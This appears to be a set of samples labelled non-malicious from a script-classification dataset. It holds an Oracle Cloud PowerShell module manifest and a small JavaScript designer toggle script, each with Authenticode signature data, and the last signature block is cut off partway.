AApBE8yN9SJ5dFAUsKkipeD6wLYkxy+IKqWP1B9EE+N41/A2iX1mGPjb8MFytsqK # 05hfyJ7hD21bkPfnhqEjU4JvCOL8xTeMwyiMxK94/SWzHCestSF6DMMq7qBeno7O # TM/Bmstas7uSmui/Ln7tJCVTQt4VVrV4dQmSeYsNIC8rMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHdXVcdldStqhsAAQAA # Ad0wDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQg9gdXCMFoT8c8i4gRIw+WrOV8wf3SEO/hqEd+wx3p # hsYwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCBh/w4tmmWsT3iZnHtH0Vk3 # 7UCN02lRxY+RiON6wDFjZjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB3V1XHZXUraobAAEAAAHdMCIEII9GF+qPcJzvNnBqauvSLu7w # PLdf14ejfnFrA7qSK5ErMA0GCSqGSIb3DQEBCwUABIICAH7c3/BqLqZYC32e3Q77 # jixPvIo1hoCoicqL4ko1JBYYcBrIVGnNOKNtgxNjN+6jB/4JvCyYPko8SdvoFqhV # uNmsYT8/yKWvCfQtJZoMRpY9k8nn2QSh7srkrAYMlDj24zD3AtcLJn8Umdj5DiRO # ah4gFxpTYLDiWWN7qtKiPzViowBsU0gfueSQPu/rOAzr1cA4fTETqzaS3u/CyVPE # 7c+pqfXsMDX8nHxCiHBuRllv7vZAc7MhLk9M9ipj+3jafOArcc/FsuSs8AkHeESb # DNtUKlsRYUjWrFrN8bh2CpqVGktZ3W0sjr9r9EB75cWx+jsrAM7UQsXVDaZbeFtg # nDH3P/Gz1+B4d0uLD1eXBS1/A1iWvvM73WZ39+AFhYRIP6i9R8IxD3vls5XJCfr4 # HousWxKNEd8RVPPIUN7RCJiTxRKF/UFDnVB197RbHCjtuU3MTheeBvuHDDtWB/Xl # Lt+NiPPSuE+KJ/hEIOD+D5lRXxhW/gpDjVS87xacDp+A36rIYSFGbrWGmg/L79x4 # 0SPMBoNJerutP49S8G5Pc8BXbEeAoIOMuUhXypd1w0PVxDxC5lV2yZbh3qVdksuW # lNOaQH5BLDviHgZ7PyMJ2q9C1XRrjP0CB9xTDieqMN+FemnEmUPDkAhxxSu6yaX9 # r5r4G+PrhqozSHlshbfnshi6 # SIG # End signature block
combined_dataset/train/non-malicious/sample_63_56.ps1
sample_63_56.ps1
# # Module manifest for module 'OCI.PSModules.Governancerulescontrolplane' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Governancerulescontrolplane.dll' # Version number of this module. ModuleVersion = '85.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '96ae80bb-9cf9-48b1-b722-28d177d3da7a' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Governancerulescontrolplane Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Governancerulescontrolplane.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIGovernancerulescontrolplaneEnforcedGovernanceRule', 'Get-OCIGovernancerulescontrolplaneEnforcedGovernanceRulesList', 'Get-OCIGovernancerulescontrolplaneGovernanceRule', 'Get-OCIGovernancerulescontrolplaneGovernanceRulesList', 'Get-OCIGovernancerulescontrolplaneInclusionCriteriaList', 'Get-OCIGovernancerulescontrolplaneInclusionCriterion', 'Get-OCIGovernancerulescontrolplaneTenancyAttachment', 'Get-OCIGovernancerulescontrolplaneTenancyAttachmentsList', 'Get-OCIGovernancerulescontrolplaneWorkRequest', 'Get-OCIGovernancerulescontrolplaneWorkRequestErrorsList', 'Get-OCIGovernancerulescontrolplaneWorkRequestLogsList', 'Get-OCIGovernancerulescontrolplaneWorkRequestsList', 'Invoke-OCIGovernancerulescontrolplaneRetryGovernanceRule', 'Invoke-OCIGovernancerulescontrolplaneRetryTenancyAttachment', 'New-OCIGovernancerulescontrolplaneGovernanceRule', 'New-OCIGovernancerulescontrolplaneInclusionCriterion', 'Remove-OCIGovernancerulescontrolplaneGovernanceRule', 'Remove-OCIGovernancerulescontrolplaneInclusionCriterion', 'Stop-OCIGovernancerulescontrolplaneWorkRequest', 'Update-OCIGovernancerulescontrolplaneGovernanceRule' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Governancerulescontrolplane' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_27_22.ps1
sample_27_22.ps1
function trySetDesignerProp(tname, ttype, val) { var trait = document.designerProps.getOrCreateTrait(tname, ttype, 0); trait.value = val; } if (command.getTrait("state").value == 0) { command.getTrait("state").value = 2; trySetDesignerProp("embedMedia", "bool", true); } else { command.getTrait("state").value = 0; trySetDesignerProp("embedMedia", "bool", false); } // SIG // Begin signature block // SIG // MIInvQYJKoZIhvcNAQcCoIInrjCCJ6oCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // Zvc/2/PDQrz4dsHSLA8yUjZq70hV9jCC73dpH82vmISg // SIG // gg12MIIF9DCCA9ygAwIBAgITMwAAA68wQA5Mo00FQQAA // SIG // AAADrzANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDkwMFoX // SIG // DTI0MTExNDE5MDkwMFowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // SIG // zkvLNa2un9GBrYNDoRGkGv7d0PqtTBB4ViYakFbjuWpm // SIG // F0KcvDAzzaCWJPhVgIXjz+S8cHEoHuWnp/n+UOljT3eh // SIG // A8Rs6Lb1aTYub3tB/e0txewv2sQ3yscjYdtTBtFvEm9L // SIG // 8Yv76K3Cxzi/Yvrdg+sr7w8y5RHn1Am0Ff8xggY1xpWC // SIG // XFI+kQM18njQDcUqSlwBnexYfqHBhzz6YXA/S0EziYBu // SIG // 2O2mM7R6gSyYkEOHgIGTVOGnOvvC5xBgC4KNcnQuQSRL // SIG // iUI2CmzU8vefR6ykruyzt1rNMPI8OqWHQtSDKXU5JNqb // SIG // k4GNjwzcwbSzOHrxuxWHq91l/vLdVDGDUwIDAQABo4IB // SIG // czCCAW8wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFEcccTTyBDxkjvJKs/m4AgEF // SIG // hl7BMEUGA1UdEQQ+MDykOjA4MR4wHAYDVQQLExVNaWNy // SIG // b3NvZnQgQ29ycG9yYXRpb24xFjAUBgNVBAUTDTIzMDAx // SIG // Mis1MDE4MjYwHwYDVR0jBBgwFoAUSG5k5VAF04KqFzc3 // SIG // IrVtqMp1ApUwVAYDVR0fBE0wSzBJoEegRYZDaHR0cDov // SIG // L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWlj // SIG // Q29kU2lnUENBMjAxMV8yMDExLTA3LTA4LmNybDBhBggr // SIG // BgEFBQcBAQRVMFMwUQYIKwYBBQUHMAKGRWh0dHA6Ly93 // SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj // SIG // Q29kU2lnUENBMjAxMV8yMDExLTA3LTA4LmNydDAMBgNV // SIG // HRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4ICAQCEsRbf // SIG // 80dn60xTweOWHZoWaQdpzSaDqIvqpYHE5ZzuEMJWDdcP // SIG // 72MGw8v6BSaJQ+a+hTCXdERnIBDPKvU4ENjgu4EBJocH // SIG // lSe8riiZUAR+z+z4OUYqoFd3EqJyfjjOJBR2z94Dy4ss // SIG // 7LEkHUbj2NZiFqBoPYu2OGQvEk+1oaUsnNKZ7Nl7FHtV // SIG // 7CI2lHBru83e4IPe3glIi0XVZJT5qV6Gx/QhAFmpEVBj // SIG // SAmDdgII4UUwuI9yiX6jJFNOEek6MoeP06LMJtbqA3Bq // SIG // +ZWmJ033F97uVpyaiS4bj3vFI/ZBgDnMqNDtZjcA2vi4 // SIG // RRMweggd9vsHyTLpn6+nXoLy03vMeebq0C3k44pgUIEu // SIG // PQUlJIRTe6IrN3GcjaZ6zHGuQGWgu6SyO9r7qkrEpS2p // SIG // RjnGZjx2RmCamdAWnDdu+DmfNEPAddYjaJJ7PTnd+PGz // SIG // G+WeH4ocWgVnm5fJFhItjj70CJjgHqt57e1FiQcyWCwB // SIG // hKX2rGgN2UICHBF3Q/rsKOspjMw2OlGphTn2KmFl5J7c // SIG // Qxru54A9roClLnHGCiSUYos/iwFHI/dAVXEh0S0KKfTf // SIG // M6AC6/9bCbsD61QLcRzRIElvgCgaiMWFjOBL99pemoEl // SIG // AHsyzG6uX93fMfas09N9YzA0/rFAKAsNDOcFbQlEHKiD // SIG // T7mI20tVoCcmSIhJATCCB3owggVioAMCAQICCmEOkNIA // SIG // AAAAAAMwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYT // SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH // SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y // SIG // cG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290 // SIG // IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDExMB4XDTEx // SIG // MDcwODIwNTkwOVoXDTI2MDcwODIxMDkwOVowfjELMAkG // SIG // A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO // SIG // BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m // SIG // dCBDb3Jwb3JhdGlvbjEoMCYGA1UEAxMfTWljcm9zb2Z0 // SIG // IENvZGUgU2lnbmluZyBQQ0EgMjAxMTCCAiIwDQYJKoZI // SIG // hvcNAQEBBQADggIPADCCAgoCggIBAKvw+nIQHC6t2G6q // SIG // ghBNNLrytlghn0IbKmvpWlCquAY4GgRJun/DDB7dN2vG // SIG // EtgL8DjCmQawyDnVARQxQtOJDXlkh36UYCRsr55JnOlo // SIG // XtLfm1OyCizDr9mpK656Ca/XllnKYBoF6WZ26DJSJhIv // SIG // 56sIUM+zRLdd2MQuA3WraPPLbfM6XKEW9Ea64DhkrG5k // SIG // NXimoGMPLdNAk/jj3gcN1Vx5pUkp5w2+oBN3vpQ97/vj // SIG // K1oQH01WKKJ6cuASOrdJXtjt7UORg9l7snuGG9k+sYxd // SIG // 6IlPhBryoS9Z5JA7La4zWMW3Pv4y07MDPbGyr5I4ftKd // SIG // gCz1TlaRITUlwzluZH9TupwPrRkjhMv0ugOGjfdf8NBS // SIG // v4yUh7zAIXQlXxgotswnKDglmDlKNs98sZKuHCOnqWbs // SIG // YR9q4ShJnV+I4iVd0yFLPlLEtVc/JAPw0XpbL9Uj43Bd // SIG // D1FGd7P4AOG8rAKCX9vAFbO9G9RVS+c5oQ/pI0m8GLhE // SIG // fEXkwcNyeuBy5yTfv0aZxe/CHFfbg43sTUkwp6uO3+xb // SIG // n6/83bBm4sGXgXvt1u1L50kppxMopqd9Z4DmimJ4X7Iv // SIG // hNdXnFy/dygo8e1twyiPLI9AN0/B4YVEicQJTMXUpUMv // SIG // dJX3bvh4IFgsE11glZo+TzOE2rCIF96eTvSWsLxGoGyY // SIG // 0uDWiIwLAgMBAAGjggHtMIIB6TAQBgkrBgEEAYI3FQEE // SIG // AwIBADAdBgNVHQ4EFgQUSG5k5VAF04KqFzc3IrVtqMp1 // SIG // ApUwGQYJKwYBBAGCNxQCBAweCgBTAHUAYgBDAEEwCwYD // SIG // VR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0j // SIG // BBgwFoAUci06AjGQQ7kUBU7h6qfHMdEjiTQwWgYDVR0f // SIG // BFMwUTBPoE2gS4ZJaHR0cDovL2NybC5taWNyb3NvZnQu // SIG // Y29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0 // SIG // MjAxMV8yMDExXzAzXzIyLmNybDBeBggrBgEFBQcBAQRS // SIG // MFAwTgYIKwYBBQUHMAKGQmh0dHA6Ly93d3cubWljcm9z // SIG // b2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0MjAx // SIG // MV8yMDExXzAzXzIyLmNydDCBnwYDVR0gBIGXMIGUMIGR // SIG // BgkrBgEEAYI3LgMwgYMwPwYIKwYBBQUHAgEWM2h0dHA6 // SIG // Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvZG9jcy9w // SIG // cmltYXJ5Y3BzLmh0bTBABggrBgEFBQcCAjA0HjIgHQBM // SIG // AGUAZwBhAGwAXwBwAG8AbABpAGMAeQBfAHMAdABhAHQA // SIG // ZQBtAGUAbgB0AC4gHTANBgkqhkiG9w0BAQsFAAOCAgEA // SIG // Z/KGpZjgVHkaLtPYdGcimwuWEeFjkplCln3SeQyQwWVf // SIG // Liw++MNy0W2D/r4/6ArKO79HqaPzadtjvyI1pZddZYSQ // SIG // fYtGUFXYDJJ80hpLHPM8QotS0LD9a+M+By4pm+Y9G6XU // SIG // tR13lDni6WTJRD14eiPzE32mkHSDjfTLJgJGKsKKELuk // SIG // qQUMm+1o+mgulaAqPyprWEljHwlpblqYluSD9MCP80Yr // SIG // 3vw70L01724lruWvJ+3Q3fMOr5kol5hNDj0L8giJ1h/D // SIG // Mhji8MUtzluetEk5CsYKwsatruWy2dsViFFFWDgycSca // SIG // f7H0J/jeLDogaZiyWYlobm+nt3TDQAUGpgEqKD6CPxNN // SIG // ZgvAs0314Y9/HG8VfUWnduVAKmWjw11SYobDHWM2l4bf // SIG // 2vP48hahmifhzaWX0O5dY0HjWwechz4GdwbRBrF1HxS+ // SIG // YWG18NzGGwS+30HHDiju3mUv7Jf2oVyW2ADWoUa9WfOX // SIG // pQlLSBCZgB/QACnFsZulP0V3HjXG0qKin3p6IvpIlR+r // SIG // +0cjgPWe+L9rt0uX4ut1eBrs6jeZeRhL/9azI2h15q/6 // SIG // /IvrC4DqaTuv/DDtBEyO3991bWORPdGdVk5Pv4BXIqF4 // SIG // ETIheu9BCrE/+6jMpF3BoYibV3FWTkhFwELJm3ZbCoBI // SIG // a/15n8G9bW1qyVJzEw16UM0xghmfMIIZmwIBATCBlTB+ // SIG // MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv // SIG // bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj // SIG // cm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNy // SIG // b3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExAhMzAAAD // SIG // rzBADkyjTQVBAAAAAAOvMA0GCWCGSAFlAwQCAQUAoIGu // SIG // MBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG // SIG // AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3 // SIG // DQEJBDEiBCDJCDiUg0lrXyRztCztoWxU040IR+MBVR8X // SIG // vNaHHkH/SzBCBgorBgEEAYI3AgEMMTQwMqAUgBIATQBp // SIG // AGMAcgBvAHMAbwBmAHShGoAYaHR0cDovL3d3dy5taWNy // SIG // b3NvZnQuY29tMA0GCSqGSIb3DQEBAQUABIIBABS2o4/f // SIG // 5Gdi4TvFPpqMJnOioI3/bvpiPz8LtSVgngVy/l3/XyMo // SIG // 1PySJIPlkTDZd903u2+CfMEiwv4/vYrLWvi0GWRkae1n // SIG // e4lmYTHU3HW1jjtbgmg6wRtGW1g/A7Uc8QdSamd7vcTo // SIG // S+sc2FsOufJeaTN/5/19PvkO5RNrIv9cvAAj5vTsY6NA // SIG // 1NtaHyndW6K5Di66GVvmlHDHv5iGnL8sGuzzHiMAtxj8 // SIG // p5/hWne+QJuo6PizaWTRhu0vX9w73SmUMvHDbjh2MYDZ // SIG // 6Vb8o2pbETGTGBtWXwzp3JfZ7ZSoOEczd+pEuyjUfvwp // SIG // WBe1Alr2tdkjEU0w4RGCMz7hD3ahghcpMIIXJQYKKwYB // SIG // BAGCNwMDATGCFxUwghcRBgkqhkiG9w0BBwKgghcCMIIW // SIG // /gIBAzEPMA0GCWCGSAFlAwQCAQUAMIIBWQYLKoZIhvcN // SIG // AQkQAQSgggFIBIIBRDCCAUACAQEGCisGAQQBhFkKAwEw // SIG // MTANBglghkgBZQMEAgEFAAQgrjW+nSXH4lYZqC/SsgxK // SIG // VriaAGPqoSb6nggSTs7YsSkCBmXV/N2llxgTMjAyNDAy // SIG // MjkwNTUzMTcuMzgzWjAEgAIB9KCB2KSB1TCB0jELMAkG // SIG // A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO // SIG // BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m // SIG // dCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0 // SIG // IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYD // SIG // VQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRCODAtNjlD // SIG // MzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg // SIG // U2VydmljZaCCEXgwggcnMIIFD6ADAgECAhMzAAAB5Y9q // SIG // wPM9tAujAAEAAAHlMA0GCSqGSIb3DQEBCwUAMHwxCzAJ // SIG // BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw // SIG // DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv // SIG // ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29m // SIG // dCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIzMTAxMjE5 // SIG // MDczNVoXDTI1MDExMDE5MDczNVowgdIxCzAJBgNVBAYT // SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH // SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y // SIG // cG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVs // SIG // YW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMd // SIG // VGhhbGVzIFRTUyBFU046M0JENC00QjgwLTY5QzMxJTAj // SIG // BgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZp // SIG // Y2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC // SIG // AQCpe+A62rtjuiy6yTtx8k7zvWl2ov/3jcj+TC1ma5lB // SIG // jTiTD8DCNPFfcwX0TzXLnK3iGEsiR45DCFBprodKz1ef // SIG // 9vlAixqzdT++5/X6v5nc1zDdRc6mjx3ShJSp3iUPEenD // SIG // +Ha7thspprda6xnDXvNNAnA+nfzXaKJppHdfelajrY2R // SIG // QNV1rvhrBQXlh4ns/z5ZanDP3lp7ZEDLNJStM5gnx/gb // SIG // u4tYfhQ0UfBe1s1K/+zN44VXT6QH6ts2AgPGVSzYBIs2 // SIG // PrxZoMfsw7rlPxgoQyu5JQ3AsPv4FaBLkjpeXJULMnVk // SIG // IySV+2dslftSguhtSVaqT93aSjwD/+LnTaqUeRyHm/E2 // SIG // tSX40VM0r96ko3ucvUWE/wI1jWEO4LHs7g1jP/HGddZH // SIG // KNSb1MjkPMfyQ5DBakkcI9b/pnOiyipY//3Vghvx8Paa // SIG // XZViV+qbA3rELkEexVe3gqlf5X2o6C6Tzcf/cxdXb/Ml // SIG // wXc5liT3gontl2kJ6wCg6pRt817sfbTUJs9i/ek3cZyD // SIG // tjhpmMQQAGQFqCm5rWCPgos+AmMjtBZuWd0+NGuXeyib // SIG // n7Regk6HHHP1Kf46RX0IrS343e9XEvnCwnqEPqtJ9CAC // SIG // 71fmnGxDaLkjq47/0LWOBSIx5SOc3ScyZxrJFSeaM4Y4 // SIG // tGEbHL9VsCRQLssgjELy3Zj3XQIDAQABo4IBSTCCAUUw // SIG // HQYDVR0OBBYEFN//n4e7TXMxInxF5QkIBTl4DIeqMB8G // SIG // A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G // SIG // A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z // SIG // b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRp // SIG // bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggr // SIG // BgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93 // SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj // SIG // cm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAo // SIG // MSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAww // SIG // CgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqG // SIG // SIb3DQEBCwUAA4ICAQAz+sIThYw9WnfBpBCfaCwbr345 // SIG // 3TMhkPUeB4ASkpT7d6WtF1S3IpqyZQ5yhoBQYlsCOlzo // SIG // MPNoXaJQ4jAwSy1kTEyR1lXlGNYFOFwfDjiMQXPf0PN8 // SIG // 29XNEVhLqYAuPCPm/tsdlTYBiVLECMj0dj4l0IU+T8nq // SIG // zIGoPTkqHUIxcKTXRoq52tq6VdtxFMBXjuft6El+CXgj // SIG // Wb4MlDsyqcjL6lWrm6PhpX/6bH1ubSHDI2VbdHpbMH6t // SIG // KiTUIKGIqW2k77+8ZosVCRk24sWIn08AIrz3CjXXorGZ // SIG // rbbOzh2wDO/eWbyi0hKl4kVIw2Gcnh8gMrDBAC2yIXV4 // SIG // BxIetCqGcs5QV891cRIqxO54bnDcDNrVYjpcCOxJHlOY // SIG // bnXLZ1whueSbjMP8G+3O9USopmQPyl5VqZgb5CZAdAWR // SIG // EvDghg3fs2P0/QZ06fLIt+k6pfOFX6WHvYh5suz6qsaj // SIG // Bdgp+KtmtJhDJ6Qa7gxhP4EfXPElSdp7ZAEcuUn5brif // SIG // zAetckb09ZlMd5cqaTttnj4wY58KBL1cWw409Y4XTDXX // SIG // rzrg3iRs0SyvRzZkwwvk3WUJY/lTICJvGXhCETRdKGr4 // SIG // hfkGXFGS1s1m2Kusg6JPBGShYkUeaLQaBi72mBacQWVB // SIG // PJpyyrg5WKG468Ye5Z8K8Vf3zMtBfX0qNicRZrS4LTCC // SIG // B3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUw // SIG // DQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRp // SIG // ZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4 // SIG // MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC // SIG // VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT // SIG // B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw // SIG // b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt // SIG // U3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUA // SIG // A4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC // SIG // 0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm // SIG // 95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNE // SIG // t6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZT // SIG // fDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQ // SIG // HJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5 // SIG // LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVV // SIG // mG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKy // SIG // zbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpG // SIG // dc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2 // SIG // TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZ // SIG // fD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q // SIG // GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL // SIG // W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU // SIG // HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXb // SIG // GjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQID // SIG // AQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAj // SIG // BgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8v // SIG // BO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1Gely // SIG // MFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // 